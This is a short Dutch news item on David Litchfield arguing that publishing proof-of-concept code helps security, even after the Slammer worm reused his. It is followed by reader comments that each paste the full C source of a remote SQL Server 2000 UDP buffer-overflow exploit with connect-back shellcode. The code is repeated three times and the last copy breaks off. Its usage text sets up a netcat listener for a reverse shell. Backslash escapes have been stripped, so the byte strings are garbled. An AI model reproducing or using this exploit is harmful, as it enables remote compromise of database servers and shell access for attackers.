Security profiteert van publicatie concept code, ook in geval Slammer
De Engelse security expert die de fout ontdekte die gebruikt werd in de Slammer worm heeft geconcludeerd dat het publiceren van concept code meer goed dan slecht doet. Al eerder liet David Litchfield van NGSSoftware weten dat zijn concept code als een template gebruikt was door de vandalen die de Slammer worm hebben gemaakt. Toch pleit David voor het bekendmaken van exploits, want alleen zo kunnen ze effectief bestreden worden.
Reacties (3)
For eduction only :-)
/*
MSSQL2000 Remote UDP Exploit!
Modified from "Advanced Windows Shellcode" by David Litchfield, [email]david@ngssoftware.com[/email]
fix a bug.
Modified by lion, [email]lion@cnhonker.net[/email]
Welcome to HUC Website http://www.cnhonker.com
*/
#include <stdio.h>
#include <winsock2.h>
#pragma comment (lib,"Ws2_32")
int GainControlOfSQL(void);
int StartWinsock(void);
struct sockaddr_in c_sa;
struct sockaddr_in s_sa;
struct hostent *he;
SOCKET sock;
unsigned long addr;
int SQLUDPPort=1434;
char host[256]="";
char request[4000]="x04";
char ping[8]="x02";
char exploit_code[]=
" x55x8BxECx68x18x10xAEx42x68x1C
"
" x10xAEx42xEBx03x5BxEBx05xE8xF8
"
" xFFxFFxFFxBExFFxFFxFFxFFx81xF6
"
" xAExFExFFxFFx03xDEx90x90x90x90
"
" x90x33xC9xB1x44xB2x58x30x13x83
"
" xEBx01xE2xF9x43x53x8Bx75xFCxFF
"
" x16x50x33xC0xB0x0Cx03xD8x53xFF
"
" x16x50x33xC0xB0x10x03xD8x53x8B
"
" x45xF4x50x8Bx75xF8xFFx16x50x33
"
" xC0xB0x0Cx03xD8x53x8Bx45xF4x50
"
" xFFx16x50x33xC0xB0x08x03xD8x53
"
" x8Bx45xF0x50xFFx16x50x33xC0xB0
"
" x10x03xD8x53x33xC0x33xC9x66xB9
"
" x04x01x50xE2xFDx89x45xDCx89x45
"
" xD8xBFx7Fx01x01x01x89x7DxD4x40
"
" x40x89x45xD0x66xB8xFFxFFx66x35
"
" xFFxCAx66x89x45xD2x6Ax01x6Ax02
"
" x8Bx75xECxFFxD6x89x45xECx6Ax10
"
" x8Dx75xD0x56x8Bx5DxECx53x8Bx45
"
" xE8xFFxD0x83xC0x44x89x85x58xFF
"
" xFFxFFx83xC0x5Ex83xC0x5Ex89x45
"
" x84x89x5Dx90x89x5Dx94x89x5Dx98
"
" x8DxBDx48xFFxFFxFFx57x8DxBDx58
"
" xFFxFFxFFx57x33xC0x50x50x50x83
"
" xC0x01x50x83xE8x01x50x50x8Bx5D
"
" xE0x53x50x8Bx45xE4xFFxD0x33xC0
"
" x50xC6x04x24x61xC6x44x24x01x64
"
" x68x54x68x72x65x68x45x78x69x74
"
" x54x8Bx45xF0x50x8Bx45xF8xFFx10
"
" xFFxD0x90x2Fx2Bx6Ax07x6Bx6Ax76
"
" x3Cx34x34x58x58x33x3Dx2Ax36x3D
"
" x34x6Bx6Ax76x3Cx34x34x58x58x58
"
" x58x0Fx0Bx19x0Bx37x3Bx33x3Dx2C
"
" x19x58x58x3Bx37x36x36x3Dx3Bx2C
"
" x58x1Bx2Ax3Dx39x2Cx3Dx08x2Ax37
"
" x3Bx3Dx2Bx2Bx19x58x58x3Bx35x3C
"
"x58";
int main(int argc, char *argv[])
{
unsigned int ErrorLevel=0,len=0,c =0;
int count = 0;
char sc[300]="";
char ipaddress[40]="";
unsigned short port = 0;
unsigned int ip = 0;
char *ipt="";
char buffer[400]="";
unsigned short prt=0;
char *prtt="";
if(argc != 2 && argc != 5)
{
printf(" ========================================
=======================rn");
printf("SQL Server UDP Buffer Overflow Remote Exploitrnn");
printf("Modified from "Advanced Windows Shellcode"rn");
printf("Code by David Litchfield, [email]david@ngssoftware.com[/email]rn");
printf("Modified by lion, fix a bug.rn");
printf("Welcome to HUC Website http://www.cnhonker.comrnn");
printf("Usage:rn");
printf(" %s Target [<NCHost> <NCPort> <SQLSP>]rnn", argv[0]);
printf("Exemple:rn");
printf("Target is MSSQL SP 0:rn");
printf(" C:\>nc -l -p 53rn");
printf(" C:\>%s db.target.com 202.202.202.202 53 0rn",argv[0]);
printf("Target is MSSQL SP 1 or 2:rn");
printf(" c:\>%s db.target.com 202.202.202.202rnn", argv[0]);
return 0;
}
strncpy(host, argv[1], 100);
if(argc == 5)
{
strncpy(ipaddress, argv[2], 36);
port = atoi(argv[3]);
// SQL Server 2000 Service pack level
// The import entry for GetProcAddress in sqlsort.dll
// is at 0x42ae1010 but on SP 1 and 2 is at 0x42ae101C
// Need to set the last byte accordingly
if(argv[4][0] == 0x30)
{
printf("MSSQL SP 0. GetProcAddress @0x42ae1010rn");
exploit_code[9]=0x10;
}
else
{
printf("MSSQL SP 1 or 2. GetProcAddress @0x42ae101Crn");
}
}
ErrorLevel = StartWinsock();
if(ErrorLevel==0)
{
printf("Starting Winsock Error.rn");
return 0;
}
if(argc == 2)
{
strcpy(request,ping);
GainControlOfSQL();
return 0;
}
strcpy(buffer,exploit_code);
// set this IP address to connect back to
// this should be your address
ip = inet_addr(ipaddress);
ipt = (char*)&ip;
buffer[142]=ipt[0];
buffer[143]=ipt[1];
buffer[144]=ipt[2];
buffer[145]=ipt[3];
// set the TCP port to connect on
// netcat should be listening on this port
// e.g. nc -l -p 80
prt = htons(port);
prt = prt ^ 0xFFFF;
prtt = (char *) &prt;
buffer[160]=prtt[0];
buffer[161]=prtt[1];
strcat(request," AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ
KKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTT
UUUUVVVVWWWWXXXX");
// Overwrite the saved return address on the stack
// This address contains a jmp esp instruction
// and is in sqlsort.dll.
strcat(request,"xDCxC9xB0x42"); // 0x42B0C9DC
// Need to do a near jump
strcat(request,"xEBx0Ex41x42x43x44x45x46");
// Need to set an address which is writable or
// sql server will crash before we can exploit
// the overrun. Rather than choosing an address
// on the stack which could be anywhere we'll
// use an address in the .data segment of sqlsort.dll
// as we're already using sqlsort for the saved
// return address
// SQL 2000 no service packs needs the address here
strcat(request,"x01x70xAEx42");
// SQL 2000 Service Pack 2 needs the address here
strcat(request,"x01x70xAEx42");
// just a few nops
strcat(request,"x90x90x90x90x90x90x90x90");
// tack on exploit code to the end of our request and fire it off
strcat(request,buffer);
GainControlOfSQL();
return 0;
}
int StartWinsock()
{
int err=0;
WORD wVersionRequested;
WSADATA wsaData;
wVersionRequested = MAKEWORD(2,1);
err = WSAStartup( wVersionRequested, &wsaData );
if (err != 0)
{
printf("error WSAStartup 1.rn");
return 0;
}
if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 1 )
{
printf("error WSAStartup 2.rn");
WSACleanup( );
return 0;
}
if (isalpha(host[0]))
{
he = gethostbyname(host);
if (he == NULL)
{
printf("Can't get the ip of %s!rn", host);
WSACleanup( );
exit(-1);
}
s_sa.sin_addr.s_addr=INADDR_ANY;
s_sa.sin_family=AF_INET;
memcpy(&s_sa.sin_addr,he->h_addr,he->h_length);
}
else
{
s_sa.sin_family=AF_INET;
s_sa.sin_addr.s_addr = inet_addr(host);
}
return 1;
}
int GainControlOfSQL(void)
{
char resp[600]="";
int snd=0,rcv=0,count=0, var=0;
unsigned int ttlbytes=0;
unsigned int to=2000;
struct sockaddr_in cli_addr;
SOCKET cli_sock;
cli_sock=socket(AF_INET,SOCK_DGRAM,0);
if (cli_sock==INVALID_SOCKET)
{
return printf("sock erronrn");
}
cli_addr.sin_family=AF_INET;
cli_addr.sin_addr.s_addr=INADDR_ANY;
cli_addr.sin_port=htons((unsigned short)53);
setsockopt(cli_sock,SOL_SOCKET,SO_RCVTIM
EO,(char *)&to,sizeof(unsigned int));
if(bind(cli_sock,(LPSOCKADDR)& cli_addr,sizeof(cli_addr))==SOCKET_ERROR
)
{
return printf("bind error");
}
s_sa.sin_port=htons((unsigned short)SQLUDPPort);
if (connect(cli_sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR)
{
return printf("Connect error");
}
else
{
snd=send(cli_sock, request , strlen (request) , 0);
printf("Packet sent!rn");
printf("If you don't have a shell it didn't work.rn");
rcv = recv(cli_sock,resp,596,0);
if(rcv > 1)
{
while(count < rcv)
{
if(resp[count]==0x00)
resp[count]=0x20;
count++;
}
printf("%s",resp);
}
}
closesocket(cli_sock);
return 0;
}
/*
MSSQL2000 Remote UDP Exploit!
Modified from "Advanced Windows Shellcode" by David Litchfield, [email]david@ngssoftware.com[/email]
fix a bug.
Modified by lion, [email]lion@cnhonker.net[/email]
Welcome to HUC Website http://www.cnhonker.com
*/
#include <stdio.h>
#include <winsock2.h>
#pragma comment (lib,"Ws2_32")
int GainControlOfSQL(void);
int StartWinsock(void);
struct sockaddr_in c_sa;
struct sockaddr_in s_sa;
struct hostent *he;
SOCKET sock;
unsigned long addr;
int SQLUDPPort=1434;
char host[256]="";
char request[4000]="x04";
char ping[8]="x02";
char exploit_code[]=
" x55x8BxECx68x18x10xAEx42x68x1C
"
" x10xAEx42xEBx03x5BxEBx05xE8xF8
"
" xFFxFFxFFxBExFFxFFxFFxFFx81xF6
"
" xAExFExFFxFFx03xDEx90x90x90x90
"
" x90x33xC9xB1x44xB2x58x30x13x83
"
" xEBx01xE2xF9x43x53x8Bx75xFCxFF
"
" x16x50x33xC0xB0x0Cx03xD8x53xFF
"
" x16x50x33xC0xB0x10x03xD8x53x8B
"
" x45xF4x50x8Bx75xF8xFFx16x50x33
"
" xC0xB0x0Cx03xD8x53x8Bx45xF4x50
"
" xFFx16x50x33xC0xB0x08x03xD8x53
"
" x8Bx45xF0x50xFFx16x50x33xC0xB0
"
" x10x03xD8x53x33xC0x33xC9x66xB9
"
" x04x01x50xE2xFDx89x45xDCx89x45
"
" xD8xBFx7Fx01x01x01x89x7DxD4x40
"
" x40x89x45xD0x66xB8xFFxFFx66x35
"
" xFFxCAx66x89x45xD2x6Ax01x6Ax02
"
" x8Bx75xECxFFxD6x89x45xECx6Ax10
"
" x8Dx75xD0x56x8Bx5DxECx53x8Bx45
"
" xE8xFFxD0x83xC0x44x89x85x58xFF
"
" xFFxFFx83xC0x5Ex83xC0x5Ex89x45
"
" x84x89x5Dx90x89x5Dx94x89x5Dx98
"
" x8DxBDx48xFFxFFxFFx57x8DxBDx58
"
" xFFxFFxFFx57x33xC0x50x50x50x83
"
" xC0x01x50x83xE8x01x50x50x8Bx5D
"
" xE0x53x50x8Bx45xE4xFFxD0x33xC0
"
" x50xC6x04x24x61xC6x44x24x01x64
"
" x68x54x68x72x65x68x45x78x69x74
"
" x54x8Bx45xF0x50x8Bx45xF8xFFx10
"
" xFFxD0x90x2Fx2Bx6Ax07x6Bx6Ax76
"
" x3Cx34x34x58x58x33x3Dx2Ax36x3D
"
" x34x6Bx6Ax76x3Cx34x34x58x58x58
"
" x58x0Fx0Bx19x0Bx37x3Bx33x3Dx2C
"
" x19x58x58x3Bx37x36x36x3Dx3Bx2C
"
" x58x1Bx2Ax3Dx39x2Cx3Dx08x2Ax37
"
" x3Bx3Dx2Bx2Bx19x58x58x3Bx35x3C
"
"x58";
int main(int argc, char *argv[])
{
unsigned int ErrorLevel=0,len=0,c =0;
int count = 0;
char sc[300]="";
char ipaddress[40]="";
unsigned short port = 0;
unsigned int ip = 0;
char *ipt="";
char buffer[400]="";
unsigned short prt=0;
char *prtt="";
if(argc != 2 && argc != 5)
{
printf(" ========================================
=======================rn");
printf("SQL Server UDP Buffer Overflow Remote Exploitrnn");
printf("Modified from "Advanced Windows Shellcode"rn");
printf("Code by David Litchfield, [email]david@ngssoftware.com[/email]rn");
printf("Modified by lion, fix a bug.rn");
printf("Welcome to HUC Website http://www.cnhonker.comrnn");
printf("Usage:rn");
printf(" %s Target [<NCHost> <NCPort> <SQLSP>]rnn", argv[0]);
printf("Exemple:rn");
printf("Target is MSSQL SP 0:rn");
printf(" C:\>nc -l -p 53rn");
printf(" C:\>%s db.target.com 202.202.202.202 53 0rn",argv[0]);
printf("Target is MSSQL SP 1 or 2:rn");
printf(" c:\>%s db.target.com 202.202.202.202rnn", argv[0]);
return 0;
}
strncpy(host, argv[1], 100);
if(argc == 5)
{
strncpy(ipaddress, argv[2], 36);
port = atoi(argv[3]);
// SQL Server 2000 Service pack level
// The import entry for GetProcAddress in sqlsort.dll
// is at 0x42ae1010 but on SP 1 and 2 is at 0x42ae101C
// Need to set the last byte accordingly
if(argv[4][0] == 0x30)
{
printf("MSSQL SP 0. GetProcAddress @0x42ae1010rn");
exploit_code[9]=0x10;
}
else
{
printf("MSSQL SP 1 or 2. GetProcAddress @0x42ae101Crn");
}
}
ErrorLevel = StartWinsock();
if(ErrorLevel==0)
{
printf("Starting Winsock Error.rn");
return 0;
}
if(argc == 2)
{
strcpy(request,ping);
GainControlOfSQL();
return 0;
}
strcpy(buffer,exploit_code);
// set this IP address to connect back to
// this should be your address
ip = inet_addr(ipaddress);
ipt = (char*)&ip;
buffer[142]=ipt[0];
buffer[143]=ipt[1];
buffer[144]=ipt[2];
buffer[145]=ipt[3];
// set the TCP port to connect on
// netcat should be listening on this port
// e.g. nc -l -p 80
prt = htons(port);
prt = prt ^ 0xFFFF;
prtt = (char *) &prt;
buffer[160]=prtt[0];
buffer[161]=prtt[1];
strcat(request," AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ
KKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTT
UUUUVVVVWWWWXXXX");
// Overwrite the saved return address on the stack
// This address contains a jmp esp instruction
// and is in sqlsort.dll.
strcat(request,"xDCxC9xB0x42"); // 0x42B0C9DC
// Need to do a near jump
strcat(request,"xEBx0Ex41x42x43x44x45x46");
// Need to set an address which is writable or
// sql server will crash before we can exploit
// the overrun. Rather than choosing an address
// on the stack which could be anywhere we'll
// use an address in the .data segment of sqlsort.dll
// as we're already using sqlsort for the saved
// return address
// SQL 2000 no service packs needs the address here
strcat(request,"x01x70xAEx42");
// SQL 2000 Service Pack 2 needs the address here
strcat(request,"x01x70xAEx42");
// just a few nops
strcat(request,"x90x90x90x90x90x90x90x90");
// tack on exploit code to the end of our request and fire it off
strcat(request,buffer);
GainControlOfSQL();
return 0;
}
int StartWinsock()
{
int err=0;
WORD wVersionRequested;
WSADATA wsaData;
wVersionRequested = MAKEWORD(2,1);
err = WSAStartup( wVersionRequested, &wsaData );
if (err != 0)
{
printf("error WSAStartup 1.rn");
return 0;
}
if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 1 )
{
printf("error WSAStartup 2.rn");
WSACleanup( );
return 0;
}
if (isalpha(host[0]))
{
he = gethostbyname(host);
if (he == NULL)
{
printf("Can't get the ip of %s!rn", host);
WSACleanup( );
exit(-1);
}
s_sa.sin_addr.s_addr=INADDR_ANY;
s_sa.sin_family=AF_INET;
memcpy(&s_sa.sin_addr,he->h_addr,he->h_length);
}
else
{
s_sa.sin_family=AF_INET;
s_sa.sin_addr.s_addr = inet_addr(host);
}
return 1;
}
int GainControlOfSQL(void)
{
char resp[600]="";
int snd=0,rcv=0,count=0, var=0;
unsigned int ttlbytes=0;
unsigned int to=2000;
struct sockaddr_in cli_addr;
SOCKET cli_sock;
cli_sock=socket(AF_INET,SOCK_DGRAM,0);
if (cli_sock==INVALID_SOCKET)
{
return printf("sock erronrn");
}
cli_addr.sin_family=AF_INET;
cli_addr.sin_addr.s_addr=INADDR_ANY;
cli_addr.sin_port=htons((unsigned short)53);
setsockopt(cli_sock,SOL_SOCKET,SO_RCVTIM
EO,(char *)&to,sizeof(unsigned int));
if(bind(cli_sock,(LPSOCKADDR)& cli_addr,sizeof(cli_addr))==SOCKET_ERROR
)
{
return printf("bind error");
}
s_sa.sin_port=htons((unsigned short)SQLUDPPort);
if (connect(cli_sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR)
{
return printf("Connect error");
}
else
{
snd=send(cli_sock, request , strlen (request) , 0);
printf("Packet sent!rn");
printf("If you don't have a shell it didn't work.rn");
rcv = recv(cli_sock,resp,596,0);
if(rcv > 1)
{
while(count < rcv)
{
if(resp[count]==0x00)
resp[count]=0x20;
count++;
}
printf("%s",resp);
}
}
closesocket(cli_sock);
return 0;
}
Originally posted by Unregistered
For eduction only :-)
/*
MSSQL2000 Remote UDP Exploit!
Modified from "Advanced Windows Shellcode" by David Litchfield, [email]david@ngssoftware.com[/email]
fix a bug.
Modified by lion, [email]lion@cnhonker.net[/email]
Welcome to HUC Website http://www.cnhonker.com
*/
#include <stdio.h>
#include <winsock2.h>
#pragma comment (lib,"Ws2_32")
int GainControlOfSQL(void);
int StartWinsock(void);
struct sockaddr_in c_sa;
struct sockaddr_in s_sa;
struct hostent *he;
SOCKET sock;
unsigned long addr;
int SQLUDPPort=1434;
char host[256]="";
char request[4000]="x04";
char ping[8]="x02";
char exploit_code[]=
" x55x8BxECx68x18x10xAEx42x68x1C
"
" x10xAEx42xEBx03x5BxEBx05xE8xF8
"
" xFFxFFxFFxBExFFxFFxFFxFFx81xF6
"
" xAExFExFFxFFx03xDEx90x90x90x90
"
" x90x33xC9xB1x44xB2x58x30x13x83
"
" xEBx01xE2xF9x43x53x8Bx75xFCxFF
"
" x16x50x33xC0xB0x0Cx03xD8x53xFF
"
" x16x50x33xC0xB0x10x03xD8x53x8B
"
" x45xF4x50x8Bx75xF8xFFx16x50x33
"
" xC0xB0x0Cx03xD8x53x8Bx45xF4x50
"
" xFFx16x50x33xC0xB0x08x03xD8x53
"
" x8Bx45xF0x50xFFx16x50x33xC0xB0
"
" x10x03xD8x53x33xC0x33xC9x66xB9
"
" x04x01x50xE2xFDx89x45xDCx89x45
"
" xD8xBFx7Fx01x01x01x89x7DxD4x40
"
" x40x89x45xD0x66xB8xFFxFFx66x35
"
" xFFxCAx66x89x45xD2x6Ax01x6Ax02
"
" x8Bx75xECxFFxD6x89x45xECx6Ax10
"
" x8Dx75xD0x56x8Bx5DxECx53x8Bx45
"
" xE8xFFxD0x83xC0x44x89x85x58xFF
"
" xFFxFFx83xC0x5Ex83xC0x5Ex89x45
"
" x84x89x5Dx90x89x5Dx94x89x5Dx98
"
" x8DxBDx48xFFxFFxFFx57x8DxBDx58
"
" xFFxFFxFFx57x33xC0x50x50x50x83
"
" xC0x01x50x83xE8x01x50x50x8Bx5D
"
" xE0x53x50x8Bx45xE4xFFxD0x33xC0
"
" x50xC6x04x24x61xC6x44x24x01x64
"
" x68x54x68x72x65x68x45x78x69x74
"
" x54x8Bx45xF0x50x8Bx45xF8xFFx10
"
" xFFxD0x90x2Fx2Bx6Ax07x6Bx6Ax76
"
" x3Cx34x34x58x58x33x3Dx2Ax36x3D
"
" x34x6Bx6Ax76x3Cx34x34x58x58x58
"
" x58x0Fx0Bx19x0Bx37x3Bx33x3Dx2C
"
" x19x58x58x3Bx37x36x36x3Dx3Bx2C
"
" x58x1Bx2Ax3Dx39x2Cx3Dx08x2Ax37
"
" x3Bx3Dx2Bx2Bx19x58x58x3Bx35x3C
"
"x58";
int main(int argc, char *argv[])
{
unsigned int ErrorLevel=0,len=0,c =0;
int count = 0;
char sc[300]="";
char ipaddress[40]="";
unsigned short port = 0;
unsigned int ip = 0;
char *ipt="";
char buffer[400]="";
unsigned short prt=0;
char *prtt="";
if(argc != 2 && argc != 5)
{
printf(" ========================================
=======================rn");
printf("SQL Server UDP Buffer Overflow Remote Exploitrnn");
printf("Modified from "Advanced Windows Shellcode"rn");
printf("Code by David Litchfield, [email]david@ngssoftware.com[/email]rn");
printf("Modified by lion, fix a bug.rn");
printf("Welcome to HUC Website http://www.cnhonker.comrnn");
printf("Usage:rn");
printf(" %s Target [<NCHost> <NCPort> <SQLSP>]rnn", argv[0]);
printf("Exemple:rn");
printf("Target is MSSQL SP 0:rn");
printf(" C:\>nc -l -p 53rn");
printf(" C:\>%s db.target.com 202.202.202.202 53 0rn",argv[0]);
printf("Target is MSSQL SP 1 or 2:rn");
printf(" c:\>%s db.target.com 202.202.202.202rnn", argv[0]);
return 0;
}
strncpy(host, argv[1], 100);
if(argc == 5)
{
strncpy(ipaddress, argv[2], 36);
port = atoi(argv[3]);
// SQL Server 2000 Service pack level
// The import entry for GetProcAddress in sqlsort.dll
// is at 0x42ae1010 but on SP 1 and 2 is at 0x42ae101C
// Need to set the last byte accordingly
if(argv[4][0] == 0x30)
{
printf("MSSQL SP 0. GetProcAddress @0x42ae1010rn");
exploit_code[9]=0x10;
}
else
{
printf("MSSQL SP 1 or 2. GetProcAddress @0x42ae101Crn");
}
}
ErrorLevel = StartWinsock();
if(ErrorLevel==0)
{
printf("Starting Winsock Error.rn");
return 0;
}
if(argc == 2)
{
strcpy(request,ping);
GainControlOfSQL();
return 0;
}
strcpy(buffer,exploit_code);
// set this IP address to connect back to
// this should be your address
ip = inet_addr(ipaddress);
ipt = (char*)&ip;
buffer[142]=ipt[0];
buffer[143]=ipt[1];
buffer[144]=ipt[2];
buffer[145]=ipt[3];
// set the TCP port to connect on
// netcat should be listening on this port
// e.g. nc -l -p 80
prt = htons(port);
prt = prt ^ 0xFFFF;
prtt = (char *) &prt;
buffer[160]=prtt[0];
buffer[161]=prtt[1];
strcat(request," AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ
KKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTT
UUUUVVVVWWWWXXXX");
// Overwrite the saved return address on the stack
// This address contains a jmp esp instruction
// and is in sqlsort.dll.
strcat(request,"xDCxC9xB0x42"); // 0x42B0C9DC
// Need to do a near jump
strcat(request,"xEBx0Ex41x42x43x44x45x46");
// Need to set an address which is writable or
// sql server will crash before we can exploit
// the overrun. Rather than choosing an address
// on the stack which could be anywhere we'll
// use an address in the .data segment of sqlsort.dll
// as we're already using sqlsort for the saved
// return address
// SQL 2000 no service packs needs the address here
strcat(request,"x01x70xAEx42");
// SQL 2000 Service Pack 2 needs the address here
strcat(request,"x01x70xAEx42");
// just a few nops
strcat(request,"x90x90x90x90x90x90x90x90");
// tack on exploit code to the end of our request and fire it off
strcat(request,buffer);
GainControlOfSQL();
return 0;
}
int StartWinsock()
{
int err=0;
WORD wVersionRequested;
WSADATA wsaData;
wVersionRequested = MAKEWORD(2,1);
err = WSAStartup( wVersionRequested, &wsaData );
if (err != 0)
{
printf("error WSAStartup 1.rn");
return 0;
}
if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 1 )
{
printf("error WSAStartup 2.rn");
WSACleanup( );
return 0;
}
if (isalpha(host[0]))
{
he = gethostbyname(host);
if (he == NULL)
{
printf("Can't get the ip of %s!rn", host);
WSACleanup( );
exit(-1);
}
s_sa.sin_addr.s_addr=INADDR_ANY;
s_sa.sin_family=AF_INET;
memcpy(&s_sa.sin_addr,he->h_addr,he->h_length);
}
else
{
s_sa.sin_family=AF_INET;
s_sa.sin_addr.s_addr = inet_addr(host);
}
return 1;
}
int GainControlOfSQL(void)
{
char resp[600]="";
int snd=0,rcv=0,count=0, var=0;
unsigned int ttlbytes=0;
unsigned int to=2000;
struct sockaddr_in cli_addr;
SOCKET cli_sock;
cli_sock=socket(AF_INET,SOCK_DGRAM,0);
if (cli_sock==INVALID_SOCKET)
{
return printf("sock erronrn");
}
cli_addr.sin_family=AF_INET;
cli_addr.sin_addr.s_addr=INADDR_ANY;
cli_addr.sin_port=htons((unsigned short)53);
setsockopt(cli_sock,SOL_SOCKET,SO_RCVTIM
EO,(char *)&to,sizeof(unsigned int));
if(bind(cli_sock,(LPSOCKADDR)& cli_addr,sizeof(cli_addr))==SOCKET_ERROR
)
{
return printf("bind error");
}
s_sa.sin_port=htons((unsigned short)SQLUDPPort);
if (connect(cli_sock,(LPSOCKADDR)&s_sa,sizeof(s_sa))==SOCKET_ERROR)
{
return printf("Connect error");
}
else
{
snd=send(cli_sock, request , strlen (request) , 0);
printf("Packet sent!rn");
printf("If you don't have a shell it didn't work.rn");
rcv = recv(cli_sock,resp,596,0);
if(rcv > 1)
{
while(count < rcv)
{
if(resp[count]==0x00)
resp[count]=0x20;
count++;
}
printf("%s",resp);
}
}
closesocket(cli_sock);
return 0;
}
uhmmm,wat moet dit allemaal hier???:/:DFor eduction only :-)
/*
MSSQL2000 Remote UDP Exploit!
Modified from "Advanced Windows Shellcode" by David Litchfield, [email]david@ngssoftware.com[/email]
fix a bug.
Modified by lion, [email]lion@cnhonker.net[/email]
Welcome to HUC Website http://www.cnhonker.com
*/
#include <stdio.h>
#include <winsock2.h>
#pragma comment (lib,"Ws2_32")
int GainControlOfSQL(void);
int StartWinsock(void);
struct sockaddr_in c_sa;
struct sockaddr_in s_sa;
struct hostent *he;
SOCKET sock;
unsigned long addr;
int SQLUDPPort=1434;
char host[256]="";
char request[4000]="x04";
char ping[8]="x02";
char exploit_code[]=
" x55x8BxECx68x18x10xAEx42x68x1C
"
" x10xAEx42xEBx03x5BxEBx05xE8xF8
"
" xFFxFFxFFxBExFFxFFxFFxFFx81xF6
"
" xAExFExFFxFFx03xDEx90x90x90x90
"
" x90x33xC9xB1x44xB2x58x30x13x83
"
" xEBx01xE2xF9x43x53x8Bx75xFCxFF
"
" x16x50x33xC0xB0x0Cx03xD8x53xFF
"
" x16x50x33xC0xB0x10x03xD8x53x8B
"
" x45xF4x50x8Bx75xF8xFFx16x50x33
"
" xC0xB0x0Cx03xD8x53x8Bx45xF4x50
"
" xFFx16x50x33xC0xB0x08x03xD8x53
"
" x8Bx45xF0x50xFFx16x50x33xC0xB0
"
" x10x03xD8x53x33xC0x33xC9x66xB9
"
" x04x01x50xE2xFDx89x45xDCx89x45
"
" xD8xBFx7Fx01x01x01x89x7DxD4x40
"
" x40x89x45xD0x66xB8xFFxFFx66x35
"
" xFFxCAx66x89x45xD2x6Ax01x6Ax02
"
" x8Bx75xECxFFxD6x89x45xECx6Ax10
"
" x8Dx75xD0x56x8Bx5DxECx53x8Bx45
"
" xE8xFFxD0x83xC0x44x89x85x58xFF
"
" xFFxFFx83xC0x5Ex83xC0x5Ex89x45
"
" x84x89x5Dx90x89x5Dx94x89x5Dx98
"
" x8DxBDx48xFFxFFxFFx57x8DxBDx58
"
" xFFxFFxFFx57x33xC0x50x50x50x83
"
" xC0x01x50x83xE8x01x50x50x8Bx5D
"
" xE0x53x50x8Bx45xE4xFFxD0x33xC0
"
" x50xC6x04x24x61xC6x44x24x01x64
"
" x68x54x68x72x65x68x45x78x69x74
"
" x54x8Bx45xF0x50x8Bx45xF8xFFx10
"
" xFFxD0x90x2Fx2Bx6Ax07x6Bx6Ax76
"
" x3Cx34x34x58x58x33x3Dx2Ax36x3D
"
" x34x6Bx6Ax76x3Cx34x34x58x58x58
"
" x58x0Fx0Bx19x0Bx37x3Bx33x3Dx2C
"
" x19x58x58x3Bx37x36x36x3Dx3Bx2C
"
" x58x1Bx2Ax3Dx39x2Cx3Dx08x2Ax37
"
" x3Bx3Dx2Bx2Bx19x58x58x3Bx35x3C
"
"x58";
int main(int argc, char *argv[])
{
unsigned int ErrorLevel=0,len=0,c =0;
int count = 0;
char sc[300]="";
char ipaddress[40]="";
unsigned short port = 0;
unsigned int ip = 0;
char *ipt="";
char buffer[400]="";
unsigned short prt=0;
char *prtt="";
if(argc != 2 && argc != 5)
{
printf(" ========================================
=======================rn");
printf("SQL Server UDP Buffer Overflow Remote Exploitrnn");
printf("Modified from "Advanced Windows Shellcode"rn");
printf("Code by David Litchfield, [email]david@ngssoftware.com[/email]rn");
printf("Modified by lion, fix a bug.rn");
printf("Welcome to HUC Website http://www.cnhonker.comrnn");
printf("Usage:rn");
printf(" %s Target [<NCHost> <NCPort> <SQLSP>]rnn", argv[0]);
printf("Exemple:rn");
printf("Target is MSSQL SP 0:rn");
printf(" C:\>nc -l -p 53rn");
printf(" C:\>%s db.target.com 202.202.202.202 53 0rn",argv[0]);
printf("Target is MSSQL SP 1 or 2:rn");
printf(" c:\>%s db.target.com 202.202.202.202rnn", argv[0]);
return 0;
}
strncpy(host, argv[1], 100);
if(argc == 5)
{
strncpy(ipaddress, argv[2], 36);
port = atoi(argv[3]);
// SQL Server 2000 Service pack level
// The import entry for GetProcAddress in sqlsort.dll
// is at 0x42ae1010 but on SP 1 and 2 is at 0x42ae101C
// Need to set the last byte accordingly
if(argv[4][0] == 0x30)
{
printf("MSSQL SP 0. GetProcAddress @0x42ae1010rn");
exploit_code[9]=0x10;
}
else
{
printf("MSSQL SP 1 or 2. GetProcAddress @0x42ae101Crn");
}
}
ErrorLevel = StartWinsock();
if(ErrorLevel==0)
{
printf("Starting Winsock Error.rn");
return 0;
}
if(argc == 2)
{
strcpy(request,ping);
GainControlOfSQL();
return 0;
}
strcpy(buffer,exploit_code);
// set this IP address to connect back to
// this should be your address
ip = inet_addr(ipaddress);
ipt = (char*)&ip;
buffer[142]=ipt[0];
buffer[143]=ipt[1];
buffer[144]=ipt[2];
buffer[145]=ipt[3];
// set the TCP port to connect on
// netcat should be listening on this port
// e.g. nc -l -p 80
prt = htons(port);
prt = prt ^ 0xFFFF;
prtt = (char *) &prt;
buffer[160]=prtt[0];
buffer[161]=prtt[1];
strcat(request," AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ
KKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTT
UUUUVVVVWWWWXXXX");
// Overwrite the saved return address on the stack
// This address contains a jmp esp instruction
// and is in sqlsort.dll.
strcat(request,"xDCxC9xB0x42"); // 0x42B0C9DC
// Need to do a near jump
strcat(request,"xEBx0Ex41x42x43x44x45x46");
// Need to set an address which is writable or
// sql server will crash before we can exploit
// the overrun. Rather than choosing an address
// on the stack which could be anywhere we'll
// use an address in the .data segment of sqlsort.dll
// as we're already using sqlsort for the saved
// return address
